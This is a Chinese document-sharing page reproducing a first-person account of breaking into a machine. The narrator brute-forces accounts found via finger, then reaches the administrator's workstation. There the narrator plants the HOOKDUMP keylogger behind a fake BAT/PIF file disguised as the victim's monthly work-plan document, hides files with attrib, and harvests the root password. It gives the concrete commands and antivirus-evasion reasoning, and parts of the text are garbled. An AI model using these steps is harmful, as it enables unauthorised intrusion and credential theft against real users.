避其锋芒linux操作系统入侵实例

《避其锋芒linux操作系统入侵实例》由会员上传分享，免费在线阅读，更多相关内容在应用文档-天天文库。

1、避其锋芒Linux操作系统入侵实例～教育资源库　　Onceuponatime，我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，aaa帐号试到zzz（bythee:rootInreallife:systemPRIVILEGEDaccount　　Directory:/Shell:/bin/sh　　LastloginFriJul2809:21onttyp0from202.xx.xx.xx　　NoPlan.　　root经常来，那个202.xx.xx.xx就是他用的工作站了，从那会不会看到点东西呢？　　vieeTypement　　x　　x　　我的公文包　

2、　Themandp.txt　　不错，确实可写。　　>deltemp.txt　　不留痕迹黑客的习惯。　　>dir/od/p　　看看都有些什么　倒数第二排那个是什么？X月工作计划.！就是它了，既然是计划就不可能写完了就丢一边，它肯定会再次打开它的至少下个月写计划时要COPY一下:->　　该动手了，我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件HOOKDUMP，我觉得它挺好的，价钱实惠，量也足　对不起，说习惯了，应该是它不仅记录下全部击键，还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单　总之，它的记录让你就和你站在他身后看

3、他操作计算机一样详细了。您要问那么多木马你为啥装这个？要知道无论是中国的冰河、spy还是外国的bus、BO，都被各种杀毒软件列为头号侦查对象，而一个root的机器上可不可能没装杀毒软件？还是HOOKDUMP好，小小的，不起眼，不过如果大家都用只怕我再用它的机会就少了　　>copyhookdump.*i:　　补充一点：上传前先编好它的hookdump.ini文件，置为隐藏方式运行，不然root一运行屏幕上蹦出一大窗口可就。　　然后再在自己的机器上编一个同名的BAT文件：X月工作计划.BAT　　>editc:X月工作计划.BAT　　echooff　　hookdump　　at

4、trib-hX月工作计划.　　C:ProgramFilesMicrosoftOfficeicrosoftOffice中。还要将运行改为最小化，退出时关闭打上勾，这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个，还有一个PIF文件就是它的图标。　　把这两个文件传上去：　　>copyX月工作计划.bati:　　>copyX月工作计划.pifi:　　然后把它的文件和自己的文件都藏起来：　　>attrib+hX月工作计划.　　>attrib+hX月工作计划.bat　　这样，root的公文包里只剩下一个和原来一模一样的WORD图标，他做梦也没想到这已

5、变成了一个BAT文件。然后可以喘口气了，让我们静静的等　　几天后，我进入这个工作站，取下记录下来的击键记录，找出root的口令，进入主机。友情提醒：，特别！